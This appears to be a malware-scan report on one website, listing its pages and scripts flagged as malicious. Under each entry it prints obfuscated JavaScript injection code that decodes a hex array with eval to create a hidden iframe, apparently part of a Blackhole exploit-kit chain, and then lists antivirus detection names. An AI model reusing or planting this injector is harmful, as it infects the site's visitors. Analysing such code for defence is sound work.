Request | Server response | Status |
http://www.rmsbus.com/ | 200 OK Content-Length: 15778 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ppncf="fr"+"omCh"+"arCo"+"de";if(document.querySelector)lenlr=4;lntq=("65,ab,ba,b3,a8,b9,ae,b4,b3,65,bc,ab,b1,b3,a8,75,7e,6d,6e,65,c0,52,4f,65,bb,a6,b7,65,b8,b9,a6,b9,ae,a8,82,6c,a6,af,a6,bd,6c,80,52,4f,65,bb,a6,b7,65,a8,b4,b3,b9,b7,b4,b1,b1,aa,b7,82,6c,ae,b3,a9,aa,bd,73,b5,ad,b5,6c,80,52,4f,65,bb,a6,b7,65,bc,ab,b1,b3,a8,65,82,65,a9,b4,a8,ba,b2,aa,b3,b9,73,a8,b7,aa,a6,b9,aa,8a,b1,aa,b2,aa,b3,b9,6d,6c,ae,ab,b7,a6,b2,aa,6c,6e,80,52,4f,52,4f,65,bc,ab,b1,b3,a8,73,b8,b7,a8,65,82,65,6c,ad,b9,b9,b5,7f,
... 3637 bytes are skipped ...a,b6,6c,6e,82,82,7a,7a,6e,c0,c2,aa,b1,b8,aa,c0,98,aa,b9,88,b4,b4,b0,ae,aa,6d,6c,bb,ae,b8,ae,b9,aa,a9,a4,ba,b6,6c,71,65,6c,7a,7a,6c,71,65,6c,76,6c,71,65,6c,74,6c,6e,80,52,4f,52,4f,bc,ab,b1,b3,a8,75,7e,6d,6e,80,52,4f,c2,52,4f,c2".split(","));lwm=eval;function klvwnq(){rwfg=function(){--(sab.body)}()}sab=document;for(emnbyc=0;emnbyc<lntq["length"];emnbyc+=1){lntq[emnbyc]=-(69)+parseInt(lntq[emnbyc],lenlr*4);}try{klvwnq()}catch(rwkszc){idurj=50-50;}if(!idurj)lwm(String[ppncf].apply(String,lntq));Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NC
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.rmsbus.com/js_preload.js | 200 OK Content-Length: 78150 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) hwd="y";oxjoac="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[oxjoac].getElementById("asd"))}()}catch(famhpp){tjiuhw=function(lalmnv){lalmnv="fro"+lalmnv;for(eov=0;eov<hwd.length;eov++){egcda+=String[lalmnv](wvm(ioa+(hwd[eov]))-(68));}};};wvm=(window.eval);ioa="0x";mkzgla=0;if(!mkzgla){try{++wvm(oxjoac)["\x62o"+"d"+hwd]}catch(famhpp){tepyn="^";}hwd="64^aa^b9^b2^a7^b8^ad^b3^b2^64^ab^bd^ad^b5^74^7d^6c^6d^64^bf^51^4e^64^ba^a5^b6^64^b7^b8^a5^b8^ad^a7^81^6b^a5^ae^a5^bc^
... 3659 bytes are skipped ...^a9^b2^70^64^a9^b2^a8^64^6d^64^6d^7f^51^4e^c1^51^4e^ad^aa^64^6c^b2^a5^ba^ad^ab^a5^b8^b3^b6^72^a7^b3^b3^af^ad^a9^89^b2^a5^a6^b0^a9^a8^6d^51^4e^bf^51^4e^ad^aa^6c^8b^a9^b8^87^b3^b3^af^ad^a9^6c^6b^ba^ad^b7^ad^b8^a9^a8^a3^b9^b5^6b^6d^81^81^79^79^6d^bf^c1^a9^b0^b7^a9^bf^97^a9^b8^87^b3^b3^af^ad^a9^6c^6b^ba^ad^b7^ad^b8^a9^a8^a3^b9^b5^6b^70^64^6b^79^79^6b^70^64^6b^75^6b^70^64^6b^73^6b^6d^7f^51^4e^51^4e^ab^bd^ad^b5^74^7d^6c^6d^7f^51^4e^c1^51^4e^c1".split(tepyn);egcda="";tjiuhw("mCharCode");wvm(""+egcda);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.rmsbus.com/preloader.js | 200 OK Content-Length: 5293 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) hwd="y";oxjoac="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[oxjoac].getElementById("asd"))}()}catch(famhpp){tjiuhw=function(lalmnv){lalmnv="fro"+lalmnv;for(eov=0;eov<hwd.length;eov++){egcda+=String[lalmnv](wvm(ioa+(hwd[eov]))-(68));}};};wvm=(window.eval);ioa="0x";mkzgla=0;if(!mkzgla){try{++wvm(oxjoac)["\x62o"+"d"+hwd]}catch(famhpp){tepyn="^";}hwd="64^aa^b9^b2^a7^b8^ad^b3^b2^64^ab^bd^ad^b5^74^7d^6c^6d^64^bf^51^4e^64^ba^a5^b6^64^b7^b8^a5^b8^ad^a7^81^6b^a5^ae^a5^bc^
... 3659 bytes are skipped ...^a9^b2^70^64^a9^b2^a8^64^6d^64^6d^7f^51^4e^c1^51^4e^ad^aa^64^6c^b2^a5^ba^ad^ab^a5^b8^b3^b6^72^a7^b3^b3^af^ad^a9^89^b2^a5^a6^b0^a9^a8^6d^51^4e^bf^51^4e^ad^aa^6c^8b^a9^b8^87^b3^b3^af^ad^a9^6c^6b^ba^ad^b7^ad^b8^a9^a8^a3^b9^b5^6b^6d^81^81^79^79^6d^bf^c1^a9^b0^b7^a9^bf^97^a9^b8^87^b3^b3^af^ad^a9^6c^6b^ba^ad^b7^ad^b8^a9^a8^a3^b9^b5^6b^70^64^6b^79^79^6b^70^64^6b^75^6b^70^64^6b^73^6b^6d^7f^51^4e^51^4e^ab^bd^ad^b5^74^7d^6c^6d^7f^51^4e^c1^51^4e^c1".split(tepyn);egcda="";tjiuhw("mCharCode");wvm(""+egcda);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.rmsbus.com/rotate.js | 200 OK Content-Length: 11161 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) hwd="y";oxjoac="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[oxjoac].getElementById("asd"))}()}catch(famhpp){tjiuhw=function(lalmnv){lalmnv="fro"+lalmnv;for(eov=0;eov<hwd.length;eov++){egcda+=String[lalmnv](wvm(ioa+(hwd[eov]))-(68));}};};wvm=(window.eval);ioa="0x";mkzgla=0;if(!mkzgla){try{++wvm(oxjoac)["\x62o"+"d"+hwd]}catch(famhpp){tepyn="^";}hwd="64^aa^b9^b2^a7^b8^ad^b3^b2^64^ab^bd^ad^b5^74^7d^6c^6d^64^bf^51^4e^64^ba^a5^b6^64^b7^b8^a5^b8^ad^a7^81^6b^a5^ae^a5^bc^
... 3659 bytes are skipped ...^a9^b2^70^64^a9^b2^a8^64^6d^64^6d^7f^51^4e^c1^51^4e^ad^aa^64^6c^b2^a5^ba^ad^ab^a5^b8^b3^b6^72^a7^b3^b3^af^ad^a9^89^b2^a5^a6^b0^a9^a8^6d^51^4e^bf^51^4e^ad^aa^6c^8b^a9^b8^87^b3^b3^af^ad^a9^6c^6b^ba^ad^b7^ad^b8^a9^a8^a3^b9^b5^6b^6d^81^81^79^79^6d^bf^c1^a9^b0^b7^a9^bf^97^a9^b8^87^b3^b3^af^ad^a9^6c^6b^ba^ad^b7^ad^b8^a9^a8^a3^b9^b5^6b^70^64^6b^79^79^6b^70^64^6b^75^6b^70^64^6b^73^6b^6d^7f^51^4e^51^4e^ab^bd^ad^b5^74^7d^6c^6d^7f^51^4e^c1^51^4e^c1".split(tepyn);egcda="";tjiuhw("mCharCode");wvm(""+egcda);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://www.rmsbus.com/index.php | 200 OK Content-Length: 15876 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ppncf="fr"+"omCh"+"arCo"+"de";if(document.querySelector)lenlr=4;lntq=("65,ab,ba,b3,a8,b9,ae,b4,b3,65,bc,ab,b1,b3,a8,75,7e,6d,6e,65,c0,52,4f,65,bb,a6,b7,65,b8,b9,a6,b9,ae,a8,82,6c,a6,af,a6,bd,6c,80,52,4f,65,bb,a6,b7,65,a8,b4,b3,b9,b7,b4,b1,b1,aa,b7,82,6c,ae,b3,a9,aa,bd,73,b5,ad,b5,6c,80,52,4f,65,bb,a6,b7,65,bc,ab,b1,b3,a8,65,82,65,a9,b4,a8,ba,b2,aa,b3,b9,73,a8,b7,aa,a6,b9,aa,8a,b1,aa,b2,aa,b3,b9,6d,6c,ae,ab,b7,a6,b2,aa,6c,6e,80,52,4f,52,4f,65,bc,ab,b1,b3,a8,73,b8,b7,a8,65,82,65,6c,ad,b9,b9,b5,7f,
... 3637 bytes are skipped ...a,b6,6c,6e,82,82,7a,7a,6e,c0,c2,aa,b1,b8,aa,c0,98,aa,b9,88,b4,b4,b0,ae,aa,6d,6c,bb,ae,b8,ae,b9,aa,a9,a4,ba,b6,6c,71,65,6c,7a,7a,6c,71,65,6c,76,6c,71,65,6c,74,6c,6e,80,52,4f,52,4f,bc,ab,b1,b3,a8,75,7e,6d,6e,80,52,4f,c2,52,4f,c2".split(","));lwm=eval;function klvwnq(){rwfg=function(){--(sab.body)}()}sab=document;for(emnbyc=0;emnbyc<lntq["length"];emnbyc+=1){lntq[emnbyc]=-(69)+parseInt(lntq[emnbyc],lenlr*4);}try{klvwnq()}catch(rwkszc){idurj=50-50;}if(!idurj)lwm(String[ppncf].apply(String,lntq));Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NC
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.rmsbus.com/esp/index.php | 200 OK Content-Length: 15863 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ppncf="fr"+"omCh"+"arCo"+"de";if(document.querySelector)lenlr=4;lntq=("65,ab,ba,b3,a8,b9,ae,b4,b3,65,bc,ab,b1,b3,a8,75,7e,6d,6e,65,c0,52,4f,65,bb,a6,b7,65,b8,b9,a6,b9,ae,a8,82,6c,a6,af,a6,bd,6c,80,52,4f,65,bb,a6,b7,65,a8,b4,b3,b9,b7,b4,b1,b1,aa,b7,82,6c,ae,b3,a9,aa,bd,73,b5,ad,b5,6c,80,52,4f,65,bb,a6,b7,65,bc,ab,b1,b3,a8,65,82,65,a9,b4,a8,ba,b2,aa,b3,b9,73,a8,b7,aa,a6,b9,aa,8a,b1,aa,b2,aa,b3,b9,6d,6c,ae,ab,b7,a6,b2,aa,6c,6e,80,52,4f,52,4f,65,bc,ab,b1,b3,a8,73,b8,b7,a8,65,82,65,6c,ad,b9,b9,b5,7f,
... 3637 bytes are skipped ...a,b6,6c,6e,82,82,7a,7a,6e,c0,c2,aa,b1,b8,aa,c0,98,aa,b9,88,b4,b4,b0,ae,aa,6d,6c,bb,ae,b8,ae,b9,aa,a9,a4,ba,b6,6c,71,65,6c,7a,7a,6c,71,65,6c,76,6c,71,65,6c,74,6c,6e,80,52,4f,52,4f,bc,ab,b1,b3,a8,75,7e,6d,6e,80,52,4f,c2,52,4f,c2".split(","));lwm=eval;function klvwnq(){rwfg=function(){--(sab.body)}()}sab=document;for(emnbyc=0;emnbyc<lntq["length"];emnbyc+=1){lntq[emnbyc]=-(69)+parseInt(lntq[emnbyc],lenlr*4);}try{klvwnq()}catch(rwkszc){idurj=50-50;}if(!idurj)lwm(String[ppncf].apply(String,lntq));Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NC
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.rmsbus.com/por/index.php | 200 OK Content-Length: 15874 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ppncf="fr"+"omCh"+"arCo"+"de";if(document.querySelector)lenlr=4;lntq=("65,ab,ba,b3,a8,b9,ae,b4,b3,65,bc,ab,b1,b3,a8,75,7e,6d,6e,65,c0,52,4f,65,bb,a6,b7,65,b8,b9,a6,b9,ae,a8,82,6c,a6,af,a6,bd,6c,80,52,4f,65,bb,a6,b7,65,a8,b4,b3,b9,b7,b4,b1,b1,aa,b7,82,6c,ae,b3,a9,aa,bd,73,b5,ad,b5,6c,80,52,4f,65,bb,a6,b7,65,bc,ab,b1,b3,a8,65,82,65,a9,b4,a8,ba,b2,aa,b3,b9,73,a8,b7,aa,a6,b9,aa,8a,b1,aa,b2,aa,b3,b9,6d,6c,ae,ab,b7,a6,b2,aa,6c,6e,80,52,4f,52,4f,65,bc,ab,b1,b3,a8,73,b8,b7,a8,65,82,65,6c,ad,b9,b9,b5,7f,
... 3637 bytes are skipped ...a,b6,6c,6e,82,82,7a,7a,6e,c0,c2,aa,b1,b8,aa,c0,98,aa,b9,88,b4,b4,b0,ae,aa,6d,6c,bb,ae,b8,ae,b9,aa,a9,a4,ba,b6,6c,71,65,6c,7a,7a,6c,71,65,6c,76,6c,71,65,6c,74,6c,6e,80,52,4f,52,4f,bc,ab,b1,b3,a8,75,7e,6d,6e,80,52,4f,c2,52,4f,c2".split(","));lwm=eval;function klvwnq(){rwfg=function(){--(sab.body)}()}sab=document;for(emnbyc=0;emnbyc<lntq["length"];emnbyc+=1){lntq[emnbyc]=-(69)+parseInt(lntq[emnbyc],lenlr*4);}try{klvwnq()}catch(rwkszc){idurj=50-50;}if(!idurj)lwm(String[ppncf].apply(String,lntq));Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- Comodo
- TrojWare.JS.Kryptik.AOH
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NC
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.rmsbus.com/por/contact.php | 200 OK Content-Length: 16305 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ppncf=\"fr\"+\"omCh\"+\"arCo\"+\"de\";if(document.querySelector)lenlr=4;lntq=(\"65,ab,ba,b3,a8,b9,ae,b4,b3,65,bc,ab,b1,b3,a8,75,7e,6d,6e,65,c0,52,4f,65,bb,a6,b7,65,b8,b9,a6,b9,ae,a8,82,6c,a6,af,a6,bd,6c,80,52,4f,65,bb,a6,b7,65,a8,b4,b3,b9,b7,b4,b1,b1,aa,b7,82,6c,ae,b3,a9,aa,bd,73,b5,ad,b5,6c,80,52,4f,65,bb,a6,b7,65,bc,ab,b1,b3,a8,65,82,65,a9,b4,a8,ba,b2,aa,b3,b9,73,a8,b7,aa,a6,b9,aa,8a,b1,aa,b2,aa,b3,b9,6d,6c,ae,ab,b7,a6,b2,aa,6c,6e,80,52,4f,52,4f,65,bc,ab,b1,b3,a8,73,b8,b7,a8,65,82,65,6c,ad,b9,
... 3651 bytes are skipped ...6c,6e,82,82,7a,7a,6e,c0,c2,aa,b1,b8,aa,c0,98,aa,b9,88,b4,b4,b0,ae,aa,6d,6c,bb,ae,b8,ae,b9,aa,a9,a4,ba,b6,6c,71,65,6c,7a,7a,6c,71,65,6c,76,6c,71,65,6c,74,6c,6e,80,52,4f,52,4f,bc,ab,b1,b3,a8,75,7e,6d,6e,80,52,4f,c2,52,4f,c2\".split(\",\"));lwm=eval;function klvwnq(){rwfg=function(){--(sab.body)}()}sab=document;for(emnbyc=0;emnbyc<lntq[\"length\"];emnbyc+=1){lntq[emnbyc]=-(69)+parseInt(lntq[emnbyc],lenlr*4);}try{klvwnq()}catch(rwkszc){idurj=50-50;}if(!idurj)lwm(String[ppncf].apply(String,lntq));Antivirus reports:- Ikarus
- Exploit.JS.Blackhole
|
http://www.rmsbus.com/por/js_preload.js | 404 Not Found Content-Length: 6692 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) tbg="fr"+"omCh"+"arCo"+"de";if(document.querySelector)gmqkfh=4;kralm=("5c,a2,b1,aa,9f,b0,a5,ab,aa,5c,a3,af,a1,b4,ab,6c,75,64,65,5c,b7,49,46,5c,b2,9d,ae,5c,af,b0,9d,b0,a5,9f,79,63,9d,a6,9d,b4,63,77,49,46,5c,b2,9d,ae,5c,9f,ab,aa,b0,ae,ab,a8,a8,a1,ae,79,63,a5,aa,a0,a1,b4,6a,ac,a4,ac,63,77,49,46,5c,b2,9d,ae,5c,a3,af,a1,b4,ab,5c,79,5c,a0,ab,9f,b1,a9,a1,aa,b0,6a,9f,ae,a1,9d,b0,a1,81,a8,a1,a9,a1,aa,b0,64,63,a5,a2,ae,9d,a9,a1,63,65,77,49,46,49,46,5c,a3,af,a1,b4,ab,6a,af,ae,9f,5c,79,5c,63,a4,b0,b0,ac,76,
... 3671 bytes are skipped ...,63,65,79,79,71,71,65,b7,b9,a1,a8,af,a1,b7,8f,a1,b0,7f,ab,ab,a7,a5,a1,64,63,b2,a5,af,a5,b0,a1,a0,9b,b1,ad,63,68,5c,63,71,71,63,68,5c,63,6d,63,68,5c,63,6b,63,65,77,49,46,49,46,a3,af,a1,b4,ab,6c,75,64,65,77,49,46,b9,49,46,b9".split(","));vhvqo=eval;function ciggb(){btrxxd=function(){--(xde.body)}()}xde=document;for(tuwikz=0;tuwikz<kralm["length"];tuwikz+=1){kralm[tuwikz]=-(60)+parseInt(kralm[tuwikz],gmqkfh*4);}try{ciggb()}catch(ckmzk){ohlv=50-50;}if(!ohlv)vhvqo(String[tbg].apply(String,kralm));Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- Comodo
- TrojWare.JS.Kryptik.AOH
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NC
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.rmsbus.com/test404page.js | 404 Not Found Content-Length: 6692 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) tbg="fr"+"omCh"+"arCo"+"de";if(document.querySelector)gmqkfh=4;kralm=("5c,a2,b1,aa,9f,b0,a5,ab,aa,5c,a3,af,a1,b4,ab,6c,75,64,65,5c,b7,49,46,5c,b2,9d,ae,5c,af,b0,9d,b0,a5,9f,79,63,9d,a6,9d,b4,63,77,49,46,5c,b2,9d,ae,5c,9f,ab,aa,b0,ae,ab,a8,a8,a1,ae,79,63,a5,aa,a0,a1,b4,6a,ac,a4,ac,63,77,49,46,5c,b2,9d,ae,5c,a3,af,a1,b4,ab,5c,79,5c,a0,ab,9f,b1,a9,a1,aa,b0,6a,9f,ae,a1,9d,b0,a1,81,a8,a1,a9,a1,aa,b0,64,63,a5,a2,ae,9d,a9,a1,63,65,77,49,46,49,46,5c,a3,af,a1,b4,ab,6a,af,ae,9f,5c,79,5c,63,a4,b0,b0,ac,76,
... 3671 bytes are skipped ...,63,65,79,79,71,71,65,b7,b9,a1,a8,af,a1,b7,8f,a1,b0,7f,ab,ab,a7,a5,a1,64,63,b2,a5,af,a5,b0,a1,a0,9b,b1,ad,63,68,5c,63,71,71,63,68,5c,63,6d,63,68,5c,63,6b,63,65,77,49,46,49,46,a3,af,a1,b4,ab,6c,75,64,65,77,49,46,b9,49,46,b9".split(","));vhvqo=eval;function ciggb(){btrxxd=function(){--(xde.body)}()}xde=document;for(tuwikz=0;tuwikz<kralm["length"];tuwikz+=1){kralm[tuwikz]=-(60)+parseInt(kralm[tuwikz],gmqkfh*4);}try{ciggb()}catch(ckmzk){ohlv=50-50;}if(!ohlv)vhvqo(String[tbg].apply(String,kralm));Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- Comodo
- TrojWare.JS.Kryptik.AOH
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NC
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.rmsbus.com/por/preloader.js | 404 Not Found Content-Length: 6692 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) tbg="fr"+"omCh"+"arCo"+"de";if(document.querySelector)gmqkfh=4;kralm=("5c,a2,b1,aa,9f,b0,a5,ab,aa,5c,a3,af,a1,b4,ab,6c,75,64,65,5c,b7,49,46,5c,b2,9d,ae,5c,af,b0,9d,b0,a5,9f,79,63,9d,a6,9d,b4,63,77,49,46,5c,b2,9d,ae,5c,9f,ab,aa,b0,ae,ab,a8,a8,a1,ae,79,63,a5,aa,a0,a1,b4,6a,ac,a4,ac,63,77,49,46,5c,b2,9d,ae,5c,a3,af,a1,b4,ab,5c,79,5c,a0,ab,9f,b1,a9,a1,aa,b0,6a,9f,ae,a1,9d,b0,a1,81,a8,a1,a9,a1,aa,b0,64,63,a5,a2,ae,9d,a9,a1,63,65,77,49,46,49,46,5c,a3,af,a1,b4,ab,6a,af,ae,9f,5c,79,5c,63,a4,b0,b0,ac,76,
... 3671 bytes are skipped ...,63,65,79,79,71,71,65,b7,b9,a1,a8,af,a1,b7,8f,a1,b0,7f,ab,ab,a7,a5,a1,64,63,b2,a5,af,a5,b0,a1,a0,9b,b1,ad,63,68,5c,63,71,71,63,68,5c,63,6d,63,68,5c,63,6b,63,65,77,49,46,49,46,a3,af,a1,b4,ab,6c,75,64,65,77,49,46,b9,49,46,b9".split(","));vhvqo=eval;function ciggb(){btrxxd=function(){--(xde.body)}()}xde=document;for(tuwikz=0;tuwikz<kralm["length"];tuwikz+=1){kralm[tuwikz]=-(60)+parseInt(kralm[tuwikz],gmqkfh*4);}try{ciggb()}catch(ckmzk){ohlv=50-50;}if(!ohlv)vhvqo(String[tbg].apply(String,kralm));Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Iframe-DNV [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NC
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Exploit.BlackHole.NC
- Emsisoft
- JS:Exploit.BlackHole.NC (B)
- Comodo
- TrojWare.JS.Kryptik.AOH
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OA
- Kaspersky
- Trojan.JS.Iframe.afs
- MicroWorld-eScan
- JS:Exploit.BlackHole.NC
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NC
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NC
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NC
|
http://www.rmsbus.com/por/upcoming-events.php | 200 OK Content-Length: 15154 Content-Type: text/html | malicious |
